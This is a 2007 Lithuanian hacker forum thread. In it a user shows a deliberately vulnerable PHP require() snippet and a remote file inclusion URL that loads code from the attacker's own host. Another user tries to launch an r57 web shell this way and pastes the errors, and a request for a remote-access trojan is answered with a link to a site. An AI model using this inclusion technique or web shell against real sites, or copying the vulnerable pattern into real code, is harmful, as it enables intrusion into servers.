Bendras forumas

Žinutė

GODhack · #391 Standartinė **GODhack** » 2007 04 14 14:10

Naujas įrankis, pernelyg pavojingas, kad būtų parodytas....

O siandien ryte as su Perl parasiau virusa kuris uzkrecia zmones, bet suprantat jis per daug pavojingas kad butu parodytas.

Kokiu mulkiu reik but kad tuo patiket?

brain5ide · #392 Standartinė **brain5ide** » 2007 04 14 16:32

Turint omeny, kad kalbama apie Javascript'ą ir client side kodo vykdymą tai visiškai realu, tuo tarpu Perl ir DNR kodus susieti būtų sudėtinga

GODhack · #393 Standartinė **GODhack** » 2007 04 14 17:53

Nea. Abiem atvejais tiek toje naujienoje tiem mano "isradime" tiek pat realu kaip nusiperdus nuskrist i menuli kaip raketai. ir gala man tu mulkiu kurie tuo tiki.

^Paulius^ · #394 Standartinė **^Paulius^** » 2007 04 19 21:05

Ar imanoma kaip nors per PHP injekcija upload'inti PHP skripta? Jeigu imanoma, tai kaip?

GODhack · #395 Standartinė **GODhack** » 2007 04 20 19:11

Tarkim turim saita lamynas.lt/lama.php:

blabla

Kodas: Pasirinkti visus

<?php
   $color = 'blue';
   if ( isset( $_GET['SPALVA'] ) )
      $color = $_GET['SPALVA'];
   require( $color . '.php' );
?>
<form>
   <select name="SPALVA">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

ir t.t. ...

Tada rasom:

Kodas: Pasirinkti visus

/lama.php?SPALVA=http://mano.kieciausias.saitas/phpkodas

Viskas. Ivedei php koda panaudodamas tikriausiai pacia paraciausia failo ivedimo i php injekcija. Gali pazaisti-pameginti ar tai tikrai suveikia ir kaip tai suveikia.

Tik bebejo cia as dar pavargau kol sugalvojau toki superlengvai pazeidziama pacio saito php koda. realybej truputi sunkiau buna.

^Paulius^ · #396 Standartinė **^Paulius^** » 2007 04 20 21:10

As kazka panasaus zinojau is zurnalo HAKERIS. Su PHP injekcija imanoma paleisti shell'a? Itariu, kad ne, todel ir noriu suzinoti kaip per PHP injekcija irasyti faila.

GODhack · #397 Standartinė **GODhack** » 2007 04 20 21:15

Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.

E~XODU~S · #398 Standartinė **E~XODU~S** » 2007 04 20 21:26

Gal kas žinote iš kur parsisiūsti CIA 1.3 versiją?Nes RAt[] neveikia

Gal kas žinote?

^Paulius^ · #399 Standartinė **^Paulius^** » 2007 04 20 21:45

GODhack rašė:Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.

Na as bandau paleisti r57 shell'a ir man meta tokias klaidas:

Kodas: Pasirinkti visus

Warning: require() [function.require]: URL file-access is disabled in the server configuration in C:\wamp\www\index.php on line 5

Warning: require(http://127.0.0.1/r57shell.php) [function.require]: failed to open stream: no suitable wrapper could be found in C:\wamp\www\index.php on line 5

Fatal error: require() [function.require]: Failed opening required 'http://127.0.0.1/r57shell.php' (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 5

Buvo dar daugiau, bet kai kurias sugebejau susitvarkyt. Is viso imanoma taip paleist?

E~XODU~S, http://www.google.lt/search?hl=lt&q=CIA ... A1ka&meta=

GODhack · #400 Standartinė **GODhack** » 2007 04 20 23:58

Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.

Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.

E~XODU~S · #401 Standartinė **E~XODU~S** » 2007 04 21 11:56

Nu nerandu...Užmuškite...gal kas galite duoti tikslią veikinčią svetainę?

(sorry už nemandagumą

)

GODhack · #402 Standartinė **GODhack** » 2007 04 21 13:43

http://www.suck-o.com/

brain5ide · #403 Standartinė **brain5ide** » 2007 04 21 23:03

GODhack rašė:Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.

Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.

Tiesą sakant tie errorai labai žiaurūs. Greičiausiai įjungtas pačiam serveryje SAFE_MODE ir neleidžia includinti nuotoliniu failu. Jeigu ir leistu tuos failus includinti, tai si r57 shello(ar bet kokio kito PHP shello) nebūtų naudos, nes paprasčiausiai uždraustos visos sisteminės funkcijos, kaip exec, system ir pan.

GODhack · #404 Standartinė **GODhack** » 2007 04 22 00:06

Bet zaidybineje situacijoje galima ju isvengti. Ne taip tiesiog supratai mano pasakyma "nelabai ziaurus". Kaip ir pats sakei si bei ta pakeitus is admino puses erroru nelieka. Taigi tai nera kritiniai, neisvengiami errorai zlugdantys bet kokias viltis.

Aiskiau isireiskiant turim labai realia ir gan paprasta teorine galimybe ir beveik neigivendinama praktine.

brain5ide · #405 Standartinė **brain5ide** » 2007 04 22 00:17

GODhack, apsikeitėm vaidmenim? Aš anksčiau teorines galimybes gvildendavau, o tu praktines

Straipsniai.lt

Bendras forumas

Dabar prisijungę